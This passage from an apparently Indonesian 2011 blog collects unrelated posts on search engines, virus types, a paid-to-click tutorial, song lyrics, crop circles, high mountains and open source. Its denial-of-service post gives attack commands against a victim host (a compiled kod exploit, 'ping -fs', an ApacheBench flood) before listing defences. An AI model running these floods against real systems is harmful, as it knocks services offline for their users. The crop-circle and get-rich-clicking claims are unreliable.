pencari seperti Google, menyimpan seluruh atau sebagian halaman sumber ( yang di sebut cache)
maupun informasi tentang halaman web itu sendiri.
Ketika seorang pengguna menggunakan mesin pencari dan memasukin query, biasanya
dengan memasukan kata kunci, mesin mencari akan meng-
indesk dan memberikan daftar halaman web yang paling sesuai dengan kriterianya.
Daftar ini biasanya di sertai ringkasan singkat menggenai judul dokumen dan terkadang sebagian
teks dari hasil pencarian yang kita cari.

Sebenarnya Banyak sekali penjelasan-penjelasan yang lebih luas dan detail tentang Mesin
Pencari (search engine) yang bias anda dapatkan dari Internet atau media lainnya, saya
hanya berusaha memberikan sedikit ilmu yang sedikit saya tahu tentang mesin pencari.

REFERENSI

Eko Supriyadi, M.Pd. Teknologi Informasi dan Komunikasi Kelas XI. Sinar Mandiri: Klaten

http://id.wikipedia.com

Jumat, 11 Maret 2011

JENIS – JENIS VIRUS

Untuk lebih mempertajam pengetahuan kita tentang virus, Aku akan coba 
memberikan penjelasan tentang jenis-jenis virus yang sering berkeliaran
di dunia cyber.

1.Virus Makro
Jenis Virus ini pasti sudah sangat sering kita dengar.Virus ini ditulis
dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa
pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila
aplikasi pembentuknya dapat berjalan dengan baik, maksudnya jika pada
komputer mac dapat menjalankan aplikasi word maka virus ini bekerja pada
komputer bersistem operasi Mac.
contoh virus:

-variant W97M, misal W97M.Panther
panjang 1234 bytes,
akanmenginfeksi NORMAL.DOT dan menginfeksi dokumen apabila dibuka.
-WM.Twno.A;TW
panjang 41984 bytes,
akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa makro, biasanya
berekstensi *.DOT dan *.DOC
-dll

2.Virus Boot Sector
Virus Boot sector ini sudah umum sekali menyebar.Virus ini dalam menggandakan
dirinya akan memindahkan atau menggantikan boot sector asli dengan program
booting virus. Sehingga saat terjadi booting maka virus akan di load kememori
dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar
(ex::monitor, printer dsb) dan dari memori ini pula virus akan menyebar
eseluruh drive yang ada dan terhubung kekomputer (ex: floopy, drive lain
selain drive c).
contoh virus :

-varian virus wyx
ex: wyx.C(B) menginfeksi boot record dan floopy ;
panjang :520 bytes;
karakteristik : memory resident dan terenkripsi)
-varian V-sign :
menginfeksi : Master boot record ;
panjang 520 bytes;
karakteristik: menetap di memori (memory resident),terenkripsi, dan polymorphic)
-Stoned.june 4th/ bloody!:
menginfeksi : Master boot record dan floopy;
panjang 520 bytes;
karakteristik: menetap di memori (memory resident), terenkripsi dan menampilkan
pesan"Bloody!june 4th 1989" setelah komputer melakukan booting sebanyak 128 kali

3.Stealth Virus
Virus ini akan menguasai tabel tabel interupt pada DOS yang sering kita kenal
dengan "Interrupt interceptor" . virus ini berkemampuan untuk mengendalikan
instruksi instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya
baik secara penuh ataupun ukurannya .
contoh virus:
-Yankee.XPEH.4928,
menginfeksi file *.COM dan *.EXE ;
panjang 4298 bytes;
karakteristik: menetap di memori, ukurantersembunyi, memiliki pemicu
-WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth
dimasukkan pula disini), menginfeksi floopy an motherboot record;
panjang 520 bytes;
menetap di memori; ukuran dan virus tersembunyi.
-Vmem(s):
menginfeksi file file *.EXE, *.SYS, dan *.COM ;
panjang fie 3275 bytes;
karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi.
-dll

4.Polymorphic Virus
Virus ini Dirancang buat mengecoh program antivirus,artinya virus ini selalu
berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah
strukturnya setiap kali selesai menginfeksi file/program lain.

contoh virus:

-Necropolis A/B,
menginfeksi file *.EXE dan *.COM;
panjang file 1963 bytes;
karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan
dapat berubah ubah struktur
-Nightfall,
menginfeksi file *.EXE;
panjang file 4554 bytes;
karakteristik : menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu,
terenkripsidan dapat berubah-ubah struktur
-dll


5.Virus File/Program
Virus ini menginfeksi file file yang dapat dieksekusi langsung dari sistem operasi,
baik itu file application (*.EXE), maupun *.COm biasanya juga hasil infeksi
dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.


6.Multi Partition Virus
Virus ini merupakan gabungan dariVirus Boot sector dan Virus file: artinya
pekerjaan yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file-
file *.EXE dan juga menginfeksi Boot Sector.

ASAL MUASAL VIRUS

1949, John Von Neuman, menggungkapkan   " teori self altering automata "
yang merupakan hasil riset dari para ahli matematika.

1960, lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba teori
yang diungkapkan oleh john v neuman, mereka bermain-main dengan teori
tersebut untuk suatu jenis permainan/game. Para ahli tersebut membuat
program yang dapat memperbanyak dirinya dan dapat menghancurkan program
buatan lawan.Program yang mampu bertahan dan menghancurkan semua program
lain, maka akan dianggap sebagai pemenangnya. Permainan ini akhirnya
menjadi permainan favorit ditiap-tiap lab komputer.semakin lama mereka
pun sadar dan mulai mewaspadai permainan ini dikarenakan program yang
diciptakan makin lama makin berbahaya, sehingga mereka melakukan
pengawasan dan pengamanan yang ketat.

1980, program tersebut yang akhirnya dikenal dengan nama "virus" ini
berhasil menyebar diluar lingkungan laboratorium, dan mulai beredar di
dunia cyber.

1980, mulailah dikenal virus-virus yang menyebar di dunia cyber.

Cara mengclick view ads onbux

Maaf Sebelum nya artikel ini saya copas dari blogger suhuptc
Berikut ini akan saya jelaskan tutorial untuk mengikuti program Onbux. Program ini adalah termasuk PTC (Paid to Click) terbaik saat ini. Cara kerja PTC ini adalah sederhana saja, yaitu kita diharuskan melihat iklan (website) lain selama kira-kira 30 detik (tergantung koneksi internet komputer anda).

Untuk satu iklan yang kita lihat kita akan dibayar $0,01. Apabila anda baru pertama kali menjadi anggota Onbux (seperti saya) maka akan mendapat 4 iklan dalam 1 hari (24 jam). Iklan yang telah dilihat (diclick) baru bisa diclick lagi setelah 24jam. Sehingga dalam sehari anda hanya dapat menggumpulkan $0,01 X 4 = $0,04/hari. Ha..ha..ha
mungkin anda tertawa melihat tiap hari hanya bisa mengantongi $0,04 atau sekitar 300 rupiah, dengan melihat iklan. Namun percayalah bahwa ada "sesuatu yang tersembunyi" pada program ini yang memungkinkan seseorang untuk mendapat jutaan rupiah tiap HARI!!! Wow...bagiamana caranya?

Akan saya bahas dipostingan berikutnya. Sekarang saya hanya akan menjelaskan cara mudah (dasar) menjalankan OnBux.

Nah yang pertama harus anda lakukan adalah mendaftar jadi member Onbux.com.
Setelah mendaftar silahkan anda login menggunakan Username dan Password anda.




Anda akan melihat halaman web seperti ini :



Silahkan anda klik "View Ads". Akan ada 4 buah iklan yang dapat anda klik berurutan satu demi satu. Ingat tidak boleh langsung empat-empatnya di klik.



Nah tiap iklan di klik akan muncul tanda bulatan biru. Anda diinstruksikan untuk mengklik pada bulatan ini. Ini adalah suatu sistim untuk menghindari kecurangan (robot software yang bisa mengclick otomatis). Setelah itu akan terbuka sebuah iklan (berbentuk halaman Website). Lihat gambar.



Kemudian tunggu sampai muncul tanda bar progress(di kiri atas) yang akan berubah warnanya menjadi hijau. selesai dalam waktu 30 detik(tergantung jaringan internet komputer anda). Sekali lagi anda akan dites untuk mengetahui bahwa anda benar manusia dan bukan robot software yang mengklik otomatis. Silahkan anda klik pada huruf yang sama.





Gambar diatas menyatakan bahwa iklan yang kita klik telah dibayar oleh neobux senilai $0.01.


Setelah terkumpul $2 lebih kita dapat payout. Ingat karena payoutnya kecil, maka ada sedikit fee yang diambil oleh Paypal. Setelah payout, tentu saja rekening kita di Onbux akan manjadi $0.00. Dan kita mulai lagi dari awal..! Gampang bukan..! Dan ingat, KLIK IKLAN ANDA SETIAP HARI untuk hasil yang lebih optimal...!

Register Disini :D

Sabtu, 12 Februari 2011

Sabtu, 05 Februari 2011

Jumat, 04 Februari 2011

baim - ratapanku mp3 + lyric [ost bintang untuk baim] di sctv

Download lagu Baim - Ratapanku (Ost. Bintang Untuk Baim) terbaru disini. Lagu Baim - Ratapanku (Ost. Bintang Untuk Baim) sedang ngetop sekarang ini. Dengarkan lagu Baim - Ratapanku (Ost. Bintang Untuk Baim) yang lain yang ga kalah keren dengan membeli album cd original Baim - Ratapanku (Ost. Bintang Untuk Baim) atau pasang RBT Baim - Ratapanku (Ost. Bintang Untuk Baim) di ponsel anda.
www.anaski.co.cc
Download : baim - ratapanku (ost. bintang untuk baim).mp3
www.anaski.co.cc
Lyric :
www.anaski.co.cc
apa karna aku semuanya begini
bisakah aku menebus salahku
malaikat malam coba dengar aku
dengar ratapan hatiku
www.anaski.co.cc
* dimana rumahMu Tuhan Maha Esa
tempat papa tidur di sampingMu Tuhan
kata bunda aku bisa jumpa dia
papa di rumah Tuhan
www.anaski.co.cc
reff:
kini tinggal kita yang masih terbangun
baik buruk hidup masih terlewati
hujanku berhenti sebentar saja
ku mau bicara

biar Tuhan dengar ratapan hatiku
aku berjanji menjaga bunda
dari keras hidup
dengarkanlah ratapanku

repeat *
repeat reff

biar Tuhan dengar ratapan hatiku
aku berjanji menjaga bunda
dari keras hidup
dengarkanlah ratapanku
www.anaski.co.cc

fenomena alam terbaru Crop Circle atau lingkaran taman

Crop Circle atau lingkaran taman adalah sebuah fenomena alam yang banyak di jumpai sekarang di bumi ini menurut beberapa orang crop circle terbentuk dari Padi yang masih hijau ambruk di tengah sawah membentuk pola lingkaran yang sangat rapi.Istilah ilmiah untuk fenomena alam ini biasa disebut dengan istilah crop circles atau linkar taman.
Berikut beberapa gambar nya

fenomena alam terbaru Crop Circle atau lingkaran taman


fenomena alam terbaru Crop Circle atau lingkaran taman

fenomena alam terbaru Crop Circle atau lingkaran taman

fenomena alam terbaru Crop Circle atau lingkaran taman

fenomena alam terbaru Crop Circle atau lingkaran taman

fenomena alam terbaru Crop Circle atau lingkaran taman

fenomena alam terbaru Crop Circle atau lingkaran taman

100 Daftar Puncak gunung tertinggi di dunia

Berikut adalah daftar puncak gunung tertinggi di dunia:

1. Everest, pegunungan Himalaya, Nepal/Tibet, 29,035 ft / 8,850 m.
2. K2 (Godwin Austen), pegunungan Karakoram, Pakistan/Cina, 28,250 ft / 8,611 m.
3. Kangchenjunga, pegunungan Himalaya, India/Nepal, 28,169 ft / 8,586 m.
4. Lhotse I, pegunungan Himalaya, Nepal/Tibet, 27,940 ft / 8,516 m.
5. Makalu I, pegunungan Himalaya, Nepal/Tibet, 27,766 ft / 8,463 m.
6. Cho Oyu, pegunungan Himalaya, Nepal/Tibet, 26,864 ft / 8,188 m.
7. Dhaulagiri, pegunungan Himalaya, Nepal, 26,795 ft / 8,167 m.
8. Manaslu I, pegunungan Himalaya, Nepal, 26,781 ft / 8,163 m.
9. Nanga Parbat, pegunungan Himalaya, Pakistan, 26,660 ft / 8,125 m.
10. Annapurna, pegunungan Himalaya, Nepal, 26,545 ft / 8,091 m.
11. Gasherbrum I, pegunungan Karakoram, Pakistan/Cina, 26,470 ft / 8,068 m.
12. Puncak Broad, pegunungan Karakoram, Pakistan/Cina, 26,400 ft / 8,047 m.
13. Gasherbrum II, pegunungan Karakoram, Pakistan/Cina, 26,360 ft / 8,035 m.
14. Shishapangma (Gosainthan), pegunungan Himalaya, Tibet, 26,289 ft / 8,013 m.
15. Annapurna II, pegunungan Himalaya, Nepal, 26,041 ft / 7,937 m.
16. Gyachung Kang, pegunungan Himalaya, Nepal, 25,910 ft / 7,897 m.
17. Distaghil Sar, pegunungan Karakoram, Pakistan, 25,858 ft / 7,882 m.
18. Himalchuli, pegunungan Himalaya, Nepal, 25,801 ft / 7,864 m.
19. Nuptse, pegunungan Himalaya, Nepal, 25,726 ft / 7,841 m.
20. Nanda Devi, pegunungan Himalaya, India, 25,663 ft / 7,824 m.
21. Masherbrum, pegunungan Karakoram, Kashmir, 25,660 ft / 7,821 m.
22. Rakaposhi, pegunungan Karakoram, Pakistan, 25,551 ft / 7,788 m.
23. Kanjut Sar, pegunungan Karakoram, Pakistan, 25,461 ft / 7,761 m.
24. Kamet, pegunungan Himalaya, India/Tibet, 25,446 ft / 7,756 m.
25. Namcha Barwa, pegunungan Himalaya, Tibet, 25,445 ft / 7,756 m.
26. Gurla Mandhata, pegunungan Himalaya, Tibet, 25,355 ft / 7,728 m.
27. Ulugh Muztagh, Kunlun, Tibet, 25,340 ft / 7,723 m.
28. Kungur, Muztagh Ata, Cina, 25,325 ft / 7,719 m.
29. Tirich Mir, Hindu Kush, Pakistan, 25,230 ft / 7,690 m.
30. Saser Kangri, pegunungan Karakoram, India, 25,172 ft / 7,672 m.
31. Makalu II, pegunungan Himalaya, Nepal, 25,120 ft / 7,657 m.
32. Minya Konka (Gongga Shan), pegunungan Daxue, Cina, 24,900 ft / 7,590 m.
33. Kula Kangri, pegunungan Himalaya, Bhutan, 24,783 ft / 7,554 m.
34. Chang-tzu, pegunungan Himalaya, Tibet, 24,780 ft / 7,553 m.
35. Muztagh Ata, pegununganMuztagh Ata, Cina, 24,757 ft / 7,546 m.
36. Skyang Kangri, pegunungan Himalaya, Kashmir, 24,750 ft / 7,544 m.
37. Puncak Ismail Samani (dulu Puncak Stalin dan Puncak Komunis), pegunungan Pamir Tajikistan, 24,590 ft / 7,495 m.
38. Puncak Jongsong, pegunungan Himalaya, Nepal, 24,472 ft / 7,459 m.
39. Puncak Pobeda, Tien Shan, Kyrgyzstan, 24,406 ft/ 7,439 m.
40. Sia Kangri, pegunungan Himalaya, Kashmir, 24,350 ft / 7,422 m.
41. Puncak Haramosh, pegunungan Karakoram, Pakistan, 24,270 ft / 7,397 m.
42. Istoro Nal, pegunungan Hindu Kush, Pakistan, 24,240 ft / 7,388 m.
43. Puncak Tent, pegunungan Himalaya, Nepal, 24,165 ft / 7,365 m.
44. Chomo Lhari, pegunungan Himalaya, Tibet/Bhutan, 24,040 ft / 7,327 m.
45. Chamlang, pegunungan Himalaya, Nepal, 24,012 ft / 7,319 m.
46. Kabru, pegunungan Himalaya, Nepal, 24,002 ft / 7,316 m.
47. Alung Gangri, pegunungan Himalaya, Tibet, 24,000 ft / 7,315 m.
48. Baltoro Kangri, pegunungan Himalaya, Kashmir, 23,990 ft / 7,312 m.
49. Muztagh Ata (K-5), pegununganKunlun, Cina, 23,890 ft / 7,282 m.
50. Mana, pegunungan Himalaya, India, 23,860 ft / 7,273 m.
51. Baruntse, pegunungan Himalaya, Nepal, 23,688 ft / 7,220 m.
52. Puncak Nepal, pegunungan Himalaya, Nepal, 23,500 ft / 7,163 m.
53. Amne Machin, pegununganKunlun, Cina, 23,490 ft / 7,160 m.
54. Gauri Sankar, pegunungan Himalaya, Nepal/Tibet, 23,440 ft / 7,145 m.
55. Badrinath, pegunungan Himalaya, India, 23,420 ft / 7,138 m.
56. Nunkun, pegunungan Himalaya, Kashmir, 23,410 ft / 7,135 m.
57. Puncak Lenin, pegunungan Pamir, Tajikistan/Kyrgyzstan, 23,405 ft / 7,134 m.
58. Pyramid, pegunungan Himalaya, Nepal, 23,400 ft / 7,132 m.
59. Api, pegunungan Himalaya, Nepal, 23,399 ft / 7,132 m.
60. Pauhunri, pegunungan Himalaya, India/Cina, 23,385 ft / 7,128 m.
61. Trisul, pegunungan Himalaya, India, 23,360 ft / 7,120 m.
62. Puncak Korzhenevski, pegunungan Pamir, Tajikistan, 23,310 ft / 7,105 m.
63. Kangto, pegunungan Himalaya, Tibet, 23,260 ft / 7,090 m.
64. Nyainqentanglha, Nyainqentanglha Shan, Cina, 23,255 ft / 7,088 m.
65. Trisuli, pegunungan Himalaya, India, 23,210 ft / 7,074 m.
66. Dunagiri, pegunungan Himalaya, India, 23,184 ft / 7,066 m.
67. Puncak Revolution, pegunungan Pamir, Tajikistan, 22,880 ft / 6,974 m.
68. Aconcagua, pegunungan Andes, Argentina, 22,834 ft / 6,960 m.
69. Ojos del Salado, pegunungan Andes, Argentina/Chili, 22,664 ft / 6,908 m.
70. Bonete, pegunungan Andes, Argentina/Chili, 22,546 ft / 6,872 m.
71. Ama Dablam, pegunungan Himalaya, Nepal, 22,494 ft / 6,856 m.
72. Tupungato, pegunungan Andes, Argentina/Chili, 22,310 ft / 6,800 m.
73. Puncak Moscow, pegunungan Pamir, Tajikistan, 22,260 ft / 6,785 m.
74. Pissis, pegunungan Andes, Argentina, 22,241 ft / 6,779 m.
75. Mercedario, pegunungan Andes, Argentina/Chili, 22,211 ft / 6,770 m.
76. HuascarĂ¡n, pegunungan Andes, Peru, 22,205 ft / 6,768 m.
77. Llullaillaco, pegunungan Andes, Argentina/Chili, 22,057 ft / 6,723 m.
78. El Libertador, pegunungan Andes, Argentina, 22,047 ft / 6,720 m.
79. Cachi, pegunungan Andes, Argentina, 22,047 ft / 6,720 m.
80. Kailas, pegunungan Himalaya, Tibet, 22,027 ft / 6,714 m.
81. Incahuasi, pegunungan Andes, Argentina/Chili, 21,720 ft / 6,620 m.
82. Yerupaja, pegunungan Andes, Peru, 21,709 ft / 6,617 m.
83. Kurumda, pegunungan Pamir, Tajikistan, 21,686 ft / 6,610 m.
84. Galan, pegunungan Andes, Argentina, 21,654 ft / 6,600 m.
85. El Muerto, pegunungan Andes, Argentina/Chili, 21,463 ft / 6,542 m.
86. Sajama, pegunungan Andes, Bolivia, 21,391 ft / 6,520 m.
87. Nacimiento, pegunungan Andes, Argentina, 21,302 ft / 6,493 m.
88. Illampu, pegunungan Andes, Bolivia, 21,276 ft / 6,485 m.
89. Illimani, pegunungan Andes, Bolivia, 21,201 ft / 6,462 m.
90. Coropuna, pegunungan Andes, Peru, 21,083 ft / 6,426 m.
91. Laudo, pegunungan Andes, Argentina, 20,997 ft / 6,400 m.
92. Ancohuma, pegunungan Andes, Bolivia, 20,958 ft / 6,388 m.
93. Cuzco, pegunungan Andes, Peru, 20,945 ft / 6,384 m.
94. Ausangate (Toro), pegunungan Andes, Argentina/Chili, 20,932 ft / 6,380 m.
95. Tres Cruces, pegunungan Andes, Argentina/Chili, 20,853 ft / 6,356 m.
96. Huandoy, pegunungan Andes, Peru, 20,852 ft / 6,356 m.
97. Parinacota, pegunungan Andes, Bolivia/Chili, 20,768 ft / 6,330 m.
98. Tortolas, pegunungan Andes, Argentina/Chili, 20,745 ft / 6,323 m.
99. Chimborazo, pegunungan Andes, Ecuador, 20,702 ft / 6,310 m.
100. Ampato, pegunungan Andes, Peru, 20,702 ft 6,310 m.

Keterangan:

* ft = satuan panjang feet (kaki)
* m = satuan panjang meter

Sumber : Wiki Indonesia

Senin, 24 Januari 2011

Teknik Melakukan Denial of Service

Melakukan DoS sebenarnya bukanlah hal yang sulit dilakukan. Berhubung DoS merupakan
dampak buruk terhadap sebuah layanan publik, cara paling ampuh untuk menghentikannya
adalah menutup layanan tersebut. Namun tentu saja hal ini tidak mengasikkan dan juga
tidak begitu menarik.
Kita akan bahas tipe-tipe serangan DoS.

1. SYN-Flooding
SYN-Flooding merupakan network Denial ofService yang memanfaatkan 'loophole'
pada saat koneksi TCP/IP terbentuk. Kernel Linux terbaru (2.0.30 dan yang
lebih baru) telah mempunyai option konfigurasi untuk mencegah Denial of
Service dengan mencegahmenolak cracker untuk mengakses sistem.
2. Pentium 'FOOF' Bug
Merupakan serangan Denial of Service terhadap prosessor Pentium yang
menyebabkan sistem menjadi reboot. Hal ini tidak bergantung terhadap jenis
sistem operasi yang digunakan tetapi lebih spesifik lagi terhadap prosessor
yang digunakan yaitu pentium.
3. Ping Flooding
Ping Flooding adalah brute force Denial of Service sederhana. Jika serangan
dilakukan oleh penyerang dengan bandwidth yang lebih baik dari korban, maka
mesin korban tidak dapat mengirimkan paket data ke dalam jaringan (network).
Hal ini terjadi karena mesin korban di banjiri (flood) oleh peket-paket ICMP.
Varian dari serangan ini disebut "smurfing"
(http://www.quadrunner.com/~chuegen/smurf.txt).

Serangan menggunakan exploits.

Beberapa hal yang harus dipahami sebelum melakukan serangan ini adalah:
A. Serangan membutuhkan Shell Linux (Unix/Comp)
B. Mendapatkan exploits di: http://packetstormsecurity.nl (gunakan
fungsi search agar lebih mudah)
C. Menggunakan/membutuhkan GCC (Gnu C Compiler)

1. KOD (Kiss of Death)
Merupakan tool Denial of Service yang dapat dugunakan untuk menyerang Ms.
Windows pada port 139 (port netbios-ssn). Fungsi utama dari tool ini adalah
membuat hang/blue screen of death pada komputer korban.
Cara penggunaan:
A. Dapatkan file kod.c
B. Compile dengan Gcc: $ gcc -o kod kod.c
C. Gunakan: $ kod [ip_korban] -p [port] -t [hits]
Kelemahan dari tool ini adalah tidak semua serangan berhasil, bergantung
kepada jenis sistem operasi dan konfigurasi server target (misalmya:
blocking)
2. BONK/BOINK
Bong adalah dasar dari teardrop (teardrop.c). Boink merupakan Improve dari
bonk.c yang dapat membuat crash mesin MS. Windows 9x dan NT
3. Jolt
Jolt sangat ampuh sekali untuk membekukan Windows 9x dan NT. Cara kerja Jolt
yaitu mengirimkan serangkaian series of spoofed dan fragmented ICMP Packet
yang tinggi sekali kepada korban.
4. NesTea
Tool ini dapat membekukan Linux dengan Versi kernel 2.0. kebawah dan Windows
versi awal. Versi improve dari NesTea dikenal dengan NesTea2
5. NewTear
Merupakan varian dari teardrop (teardrop.c) namun berbeda dengan bonk
(bonk.c)
6. Syndrop
Merupakan 'serangan gabungan' dari TearDrop dan TCP SYN Flooding. Target
serangan adalah Linux dan Windows
7. TearDrop
TearDrop mengirimkan paket Fragmented IP ke komputer (Windows) yang terhubung
ke jaringan (network). Serangan ini memanfaatkan overlapping ip fragment, bug
yang terdapat pada Windowx 9x dan NT. Dampak yang timbul dari serangan ini
adalah Blue Screen of Death

Serangan langsung (+ 31337)

1. Ping Flood
Membutuhkan akses root untuk melakukan ini pada sistem Linux. Implementasinya
sederhana saja, yaitu dengan mengirimkan paket data secara besar-besaran.
bash # ping -fs 65000 [ip_target]
2. Apache Benchmark
Program-program Benchmark WWW, digunakan untuk mengukur kinerja (kekuatan)
suatu web server, namun tidak tertutup kemungkinan untuk melakukan
penyalahgunaan.
bash $ /usr/sbin/ab -n 10000 -c 300 \
http://korban.com/cgi-bin/search.cgi?q=kata+yang+cukup+umum
(diketik dalam 1 baris!)
Akan melakukan 10000 request paralel 300 kepada host korban.com
3. Menggantung Socket
Apache memiliki kapasitas jumlah koneksi yang kecil. Konfigurasi universal
oleh Apache Software Foundation adalah MaxClients 150, yang berarti hanyak
koneksi yang diperbolehkan mengakses Apache dibatasi sebanyak 150 clients.
Jumlah ini sedikit banyak dapat berkurang mengingat browser lebih dari 1
request simultan dengan koneksi terpisah-pisah.

Penyerang hanya melakukan koneksi lalu diam, pada saat itu apache akan
menunggu selama waktu yang ditetukan direktif TimeOut (default 5 menit).
Dengan mengirimkan request simultan yang cukup banyak penyerang akan memaksa
batasan maksimal MaxClients. Dampak yang terjadi, clien yang mengakses apache
akan tertunda dan apa bila backlog TCP terlampaui maka terjadi penolakan,
seolah-olah server korban tewas.

Denial of Sevice, serangan yang menghabiskan resource.

Pada dasarnya, untuk melumpuhkan sebuah layanan dibutuhkan pemakaian resource
yang besar, sehingga komputer/mesin yang diserang kehabisan resource dan
manjadi hang. Beberapa jenis resource yang dihabiskan diantaranya:

A. Swap Space
B. Bandwidth
C. Kernel Tables
D. RAM
E. Disk
F. Caches
G. INETD

A. Swap Space

Hampir semua sistem menggunakan ratusan MBs spasi swap untuk melayani permintaan
client. Spasi swap juga digunakan untuk mem-'forked' child process. Bagaimanapun
spasi swap selalu berubah dan digunakan dengan sangat berat. Beberapa serangan
Denial of Service mencoba untuk memenuhi (mengisi) spasi swap ini.

B. Bandwidth

Beberapa serangan Denial of Service menghabiskan bandwidth.

C. Kernel Tables

Serangan pada kernel tables, bisa berakibat sangat buruk pada sistem. Alokasi
memori kepada kernel juga merupakan target serangan yang sensitif. Kernel
memiliki kernelmap limit, jika sistem mencapai posisi ini, maka sistem tidak
bisa lagi mengalokasikan memory untuk kernel dan sistem harus di re-boot.

D. RAM

Serangan Denial of Service banyak menghabiskan RAM sehingga sistem mau-tidak
mau harus di re-boot.

E. Disk

Serangan klasik banyak dilakukan dengan memenuhi Disk.

F. Caches

G. INETD

Sekali saja INETD crash, semua service (layanan) yang melalui INETD tidak akan
bekerja.

Penanggulangan serangan Denial of Service

Sejujurnya, bagian inilah yang paling sulit. Anda bisa lihat bagaimana
mudahnya menggunaka sploits/tool untuk membekukan Ms Windows, atau
bagaimana mudahnya melakukan input flooding dan membuat tool sendiri.
Namun Denial of service adalah masalah layanan publik.Sama halnya dengan
anda memiliki toko, sekelompok orang jahat bisa saja masuk beramai-ramai
sehingga toko anda penuh. Anda bisa saja mengatasi 'serangan' ini dengan
'menutup' toko anda - dan ini adalah cara paling efektif - namun jawaban
kekanak-kanakan demikian tentu tidak anda harapkan.

1. Selalu Up 2 Date.
Seperti contoh serangan diatas, SYN Flooding sangat efektif untuk membekukan
Linux kernel 2.0.*. Dalam hal ini Linux kernel 2.0.30 keatas cukup handal
untuk mengatasi serangan tersebut dikarenakan versi 2.0.30 memiliki option
untuk menolak cracker untuk mengakses system.

2. Ikuti perkembangan security
Hal ini sangat efektif dalam mencegah pengerusakan sistem secara ilegal.
Banyak admin malas untuk mengikuti issue-issue terbaru perkembangan dunia
security. Dampak yang paling buruk, sistem cracker yang 'rajin', 'ulet'
dan 'terlatih' akan sangat mudah untuk memasuki sistem dan merusak -
tidak tertutup kemungkinan untuk melakukan Denial of Service -.
Berhubungan dengan 'Selalu Up 2 Date', Denial of service secara langsung
dengan Flooding dapat diatasi dengan menginstall patch terbaru dari vendor
atau melakukan up-date.

3. Teknik pengamanan httpd Apache.
+ Pencegahan serangan Apache Benchmark.
Hal ini sebenarnya sangat sulit untuk diatasi. Anda bisa melakukan
identifikasi terhadap pelaku dan melakukan pemblokiran manual melalui
firewall atau mekanisme kontrol Apache (Order, Allow from, Deny From ).
Tentunya teknik ini akan sangat membosankan dimana anda sebagai seorang
admin harus teliti.
Mengecilkan MexClients juga hal yang baik, analognya dengan membatasi
jumlah pengunjung akan menjaga toko anda dari 'Denial of Service'.
Jangan lupa juga menambah RAM.

4. Pencegahan serangan non elektronik.
Serangan yang paling efektif pada dasarnya adalah local. Selain efektif
juga sangat berbahaya. Jangan pernah berfikir sistem anda benar-benar aman,
atau semua user adalah orang 'baik'. Pertimbangkan semua aspek. Anda bisa
menerapkan peraturan tegas dan sanksi untuk mencegah user melakukan serangan
dari dalam. Mungkin cukup efektif jika dibantu oleh kedewasaan berfikir dari
admin dan user bersangkutan.

Motif penyerang melakukan Denial of Service

Menurut Hans Husman (t95hhu@student.tdb.uu.se), ada beberapa motif cracker
dalam melakukan Denial of Service yaitu:

1. Status Sub-Kultural.
2. Untuk mendapatkan akses.
3. Balas dendam.
4. Alasan politik.
5. Alasan ekonomi.
6. Tujuan kejahatan/keisengan.

Satatus subkultural dalam dunia hacker, adalah sebuah unjuk gigi atau lebih
tepat kita sebut sebagai pencarian jati diri. Adalah sebuah aktifitas umum
dikalangan hacker-hacker muda untuk menjukkan kemampuannya dan Denial of
Service merupakan aktifitas hacker diawal karirnya. Alasan politik dan
ekonomi untuk saat sekarang juga merupakan alasan yang paling relevan. Kita
bisa melihat dalam 'perang cyber' (cyber war), serangan DoS bahkan dilakukan
secara terdistribusi atau lebih dikenal dengan istilah 'distribute Denial of
Service'. Beberapa kasus serangan virus semacam 'code-red' melakukan serangan
DoS bahkan secara otomatis dengan memanfaatkan komputer yang terinfeksi,
komputer ini disebut 'zombie' dalam jargon.Lebih relevan lagi, keisengan
merupakan motif yang paling sering dijumpai. Bukanlah hal sulit untuk
mendapatkan program-program DoS, seperti nestea, teardrop, land, boink,
jolt dan vadim. Program-program DoS dapat melakukan serangan Denial of
Service dengan sangat tepat, dan yang terpenting sangat mudah untuk
melakukannya. Cracker cukup mengetikkan satu baris perintah pada Linux Shell
yang berupa ./nama_program argv argc ...

Apa itu Denial of Service (DoS) ?

Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis)
atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat
menggunakan layanan tersebut. Dampak akhir dari aktifitas ini menjurus
kepada tehambatnya aktifitas korban yang dapat berakibat sangat fatal
(dalam kasus tertentu). Pada dasarnya Denial of Service merupakan serangan
yang sulit diatasi, hal ini disebabkan oleh resiko layanan publik dimana
admin akan berada pada kondisi yang membingungkan antara layanan dan
kenyamanan terhadap keamanan. Seperti yang kita tahu, keyamanan berbanding
terbalik dengan keamanan. Maka resiko yang mungkin timbul selalu mengikuti
hukum ini.

Beberapa aktifitas DoS adalah:

1. Aktifitas 'flooding' terhadap suatu server.
2. Memutuskan koneksi antara 2 mesin.
3. Mencegah korban untuk dapat menggunakan layanan.
4. Merusak sistem agar korban tidak dapat menggunakan layanan.

Jumat, 21 Januari 2011

Sedikit tentang Open source

Open Source adalah sebuah sistem baru dalam mendistribusikan software kepada
pengguna dengan memberikan program dan source code nya secara gratis! Bahkan
pengguna dapat mempelajari dan melakukan modifikasi untuk membuat software
tersebut sesuai dengan kebutuhan mereka.

Richard M. Stallman,pendiri Free Software Foundation -sebuah organisasi yang
mendukung Open Source,mengeluarkan sebuah lisensi software untuk Open Source
yang dinamakan GPL (GNU Public License). Lisensi inilah yang saat ini paling
banyak digunakan untuk mendistribusikan software Open Source. Selain GPL,
masih banyak lisensi software lainnya yang dikembangkan oleh komunitas Open
Source.

Berikut adalah keuntungan software Open Source:

Sisi pengguna:

* Gratis
* Pengguna dapat terlibat dalam pengembangan program karena memiliki
* source code nya
* Respon yang baik dari pemakai sehingga bug dapat ditemukan dan
* diperbaiki dengan lebih cepat.

Sisi developer:

* Seluruh komunitas mau dan dapat membantu untuk membuat software anda
